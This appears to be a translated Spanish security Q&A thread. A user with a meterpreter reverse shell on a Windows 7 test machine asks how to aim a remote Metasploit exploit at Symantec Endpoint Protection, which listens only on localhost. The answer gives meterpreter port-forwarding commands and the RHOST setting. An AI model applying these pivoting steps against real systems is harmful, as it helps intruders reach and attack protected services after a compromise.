Metasploit explota localmente

1

Tengo una máquina de prueba en ejecución:

  • Windows 7
  • Symantec Endpoint Protection.

El firewall solo permite el acceso a Symantec Endpoint Protection a través de 127.0.0.1.

Si he ganado un shell en la máquina a través de windows / meterpreter / reverse_tcp.

Y encontré un exploit para usar contra Symantec, pero el exploit es remoto y solo acepta RHOST y no SESSION.

¿Hay alguna manera de que yo proporcione una sesión en lugar de una IP remota para que funcione el exploit?

    
pregunta Ankh2054 02.08.2016 - 13:37
fuente

1 respuesta

1

Dentro de su meterpreter reenvíe el puerto desde su máquina local:

meterpreter > portfwd add –l 3389 –p 3389 –r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
meterpreter > background

Luego establece RHOST en 127.0.0.1.

msf > set RHOST 127.0.0.1
msf > exploit

Docco aquí .

    
respondido por el SilverlightFox 02.08.2016 - 14:57
fuente

Lea otras preguntas en las etiquetas